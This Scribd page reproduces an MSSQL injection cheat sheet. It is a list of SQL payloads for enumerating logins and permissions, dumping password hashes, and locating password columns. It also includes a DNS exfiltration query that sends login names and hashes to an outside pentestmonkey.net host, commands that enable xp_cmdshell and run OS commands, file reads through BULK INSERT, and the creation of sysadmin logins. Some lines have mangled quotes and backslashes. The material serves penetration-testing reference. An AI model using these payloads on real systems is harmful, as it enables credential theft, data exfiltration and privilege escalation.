Scribd
Upload
60 views

MSSQL Injection Cheat Sheet

The document contains a series of SQL queries that: 1) Return information about the SQL Server instance, databases, logins, and permissions including the server version, current user and roles, login names and passwords, and permissions. 2) Test and demonstrate various SQL functions and operations including data type conversions, string manipulation, waiting, and execution of system stored procedures. 3) Potentially expose sensitive information or enable escalated access by executing system stored procedures to read and write files, execute operating system commands, add or drop logins, and alter server roles.

Uploaded by

Vladimir Shatsilov
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
60 views

MSSQL Injection Cheat Sheet

The document contains a series of SQL queries that: 1) Return information about the SQL Server instance, databases, logins, and permissions including the server version, current user and roles, login names and passwords, and permissions. 2) Test and demonstrate various SQL functions and operations including data type conversions, string manipulation, waiting, and execution of system stored procedures. 3) Potentially expose sensitive information or enable escalated access by executing system stored procedures to read and write files, execute operating system commands, add or drop logins, and alter server roles.

Uploaded by

Vladimir Shatsilov
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

SELECT @@version

SELECT 1
SELECT /*comment*/1
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
SELECT name FROM master..syslogins
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from
master.sys.sql_logins
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE');
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER');
SELECT permission_name FROM master..fn_my_permissions('master..syslogins',
'OBJECT'); –permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('sysadmin', 'sa');
SELECT name FROM master..syslogins WHERE sysadmin = '1'
SELECT DB_NAME()
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N);
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name =
'mytable');
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name='sometable';
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name='sometable';
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects
JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND
syscolumns.name LIKE '%PASSWORD%'
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC)
sq ORDER BY name DESC
SELECT substring('abcd', 3, 1)
SELECT 6 & 2
SELECT 6 & 1
SELECT char(0×41)
SELECT ascii('A')
SELECT CAST('1' as int);
SELECT CAST(1 as char)
SELECT 'A' + 'B'
IF (1=1) SELECT 1 ELSE SELECT 2
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END
SELECT char(65)+char(66)
WAITFOR DELAY '0:0:5'
declare @host varchar(800); select @host = name FROM master..syslogins;
exec('master..xp_getfiledetails ”\' + @host + 'c$boot.ini”');
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) +
'.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ”\' + @host +
'c$boot.ini”');
– Also check out theDNS tunnel feature of sqlninja
EXEC xp_cmdshell 'net user';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:boot.ini';
DROP TABLE mydata;
SELECT HOST_NAME()
EXEC sp_addlogin 'user', 'pass';
EXEC sp_droplogin 'user';
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
EXEC sp_helpdb master;
EXEC sp_helpdb pubs;
northwind
model
msdb
pubs
tempdb

You might also like